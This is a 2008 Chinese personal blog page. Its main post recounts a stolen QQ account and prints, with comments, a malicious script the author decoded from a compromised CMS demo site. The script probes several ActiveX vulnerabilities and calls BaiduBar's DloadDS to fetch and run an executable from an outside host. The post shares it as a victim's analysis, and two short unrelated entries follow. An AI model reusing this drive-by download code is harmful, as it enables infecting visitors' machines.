• 1 
预览模式: 普通 | 列表

现在的盗QQ伎俩还真不懒

作者:BaoBaoCool 日期:2008-04-14 18:43

今天吃完中饭回来,发现QQ被下线,提示密码错误,再尝试登陆,还是错误。。

糟了,密码被盗了。。。

赶快找回,结果被盗号者申请二代密保了,我自己是没申请过的,无法找回。

再去申诉,结果提示正在申诉中。

我靠,如今这盗号者蛮牛的啊,把我的后路都给堵死了。。。

打电话给腾讯,我操她母亲,客服一直是全忙,打了十几个才有人接,我的长途费呀!~~~

被告知要等他的申诉结果出来后我再继续申诉,我靠~~~~~不过还好,下午5点我再去申诉,可以了。。。

目前等待结果中。。。。

-------------------------

回过头来想想密码什么时候被盗的~

第一反应是前几天在落伍点了风讯的demo站,当时这个站有挂马,但是卡巴斯基没报毒。PS:风讯看来现在真的不行了,连演示站都被别人挂马。。。

然后再回到风讯那个站,现在我当然不敢打开了,本地用PHP来获取网页源代码,最后一行发现iframe和script内容,拿到链接后再提取,解密,再提取,再解密,再提取,再解密…………我也搞不清提取了几次解密了几次,最后获得如下病毒代码,注释是我自己加的。

  1. <script>
  2.  window.defaultStatus="完成";
  3.  
  4.  
  5.  try{
  6.  var e;
  7.  var ado=(document.createElement("object"));
  8.  var kav="20080329";
  9.  ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
  10.  var as=ado.createobject("Adodb.Stream","")
  11.  }
  12.  
  13.  catch(e){};
  14.  
  15.  finally{
  16.  if(e!="[object Error]"){
  17.  document.write("<\/script>")
  18.  }else{
  19.  try{
  20.  var f;
  21.  var thunder=new ActiveXObject("DPClient.Vod");
  22.  }
  23.  catch(f){};
  24.  finally{
  25.  if(f!="[object Error]"){
  26.  document.write("<\/script>")
  27.  }
  28.  }
  29.  //迅雷漏洞
  30.  
  31.  try{
  32.  var g;
  33.  var glworld=new ActiveXObject("GLCHAT.GLChatCtrl.1");
  34.  }
  35.  catch(g){};
  36.  finally{
  37.  if(g!="[object Error]"){
  38.  document.write("<\/SCriPt>")
  39.  }
  40.  }
  41.  //联众游戏聊天室组件漏洞
  42.  
  43.  try{
  44.  var h;
  45.  var storm=new ActiveXObject("MPS.StormPlayer.1");
  46.  }
  47.  catch(h){};
  48.  finally{
  49.  if(h!="[object Error]"){
  50.  document.write("<\/script>")
  51.  }
  52.  }
  53.  //暴风影音漏洞
  54.  
  55.  try{
  56.  var i;
  57.  var real=new ActiveXObject("IERPCtl.IERPCtl.1");
  58.  }
  59.  catch(i){};
  60.  finally{
  61.  if(i!="[object Error]"){
  62.  document.write("<\/script>") document.write("<\/script>")
  63.  }
  64.  }
  65.  //real漏洞
  66.  
  67.  try{
  68.  var j;
  69.  var Baidu=new ActiveXObject("BaiduBar.Tool");
  70.  }
  71.  catch(j){};
  72.  finally{
  73.  if(j!="[object Error]"){
  74.  Baidu["DloadDS"]("http://c.158dm.com/Baidu.cab", "Baidu.exe", 0)
  75.  }
  76.  }
  77.  //百度bar漏洞
  78.  
  79.  if(f=="[object Error]" && g=="[object Error]" && h=="[object Error]" && i=="[object Error]" && j=="[object Error]") {
  80.  location.replace("about:blank");
  81.  }
  82.  }
  83.  }
  84.  /*Extreme*/
  85. </script>


然后就是分析代码了,他所利用的这些漏洞我全部没有啊,然后我还试图下载那个baidu的exe文件,卡巴马上报毒。。。

这是怎么回事???

只有一种可能,不是这个马,我根本没中这个马。也难怪我卡巴全盘杀毒没一个毒。用最近流行的机器狗和磁碟机专杀也没反应。

那会是什么?

也只有一种可能了,上个星期二去学校附近的网吧上网了,在那里登了QQ

但是我输入密码的时候是用QQ自带软键盘的输入的,哎,看来这个安全加密软键盘也不安全。

再来分析盗号的过程。

盗号者在获得我的QQ号码之后,并不急着改密码,因为他也改不了,而是进行申请二代密保,申请需要最多72小时(好像是),申请成功后就可以重新设置密码了,于是我的密码没了;为了防止我申诉回来,他在我之前进行申诉,导致我无法申诉。    真牛你~~~

今天马上给另外一个QQ号码申请了二代密保,不到1个小时就通过了,哎,看来还是要申请二代保安全。。。

还没申请的赶快去申请吧~~~

希望以上内容对你有点帮助~

标签: 日记 QQ
类别: 心情杂记 | 引用: 0 | 评论: 2 | 阅读: 500 | 打印 | 打包

霏凡宝贝QQ表情图

作者:BaoBaoCool 日期:2007-05-13 10:59

attachments/200705/8861024201.gif    attachments/200705/9405733454.gif

25个打包下载  下载文件20070511133225.rar (195.31 KB , 下载:87次)
标签: QQ
类别: 资源收集 | 引用: 0 | 评论: 0 | 阅读: 2726 | 打印 | 打包

曝光几个有问题的QQ版本(存在盗号,盗QB行为)

作者:BaoBaoCool 日期:2006-10-15 14:05

因为QQ公司的提供的原版QQ太庞大,
或者插件广告太多等原因很多朋友都选择一些其他的修改版QQ
但我们不知道的是很多QQ修改版作者加入了一些不道德的行为!
如:存在盗号,盗QB行为……

[阅读全文]

标签: QQ QB
类别: 资源收集 | 引用: 0 | 评论: 3 | 阅读: 2084 | 打印 | 打包
  • 1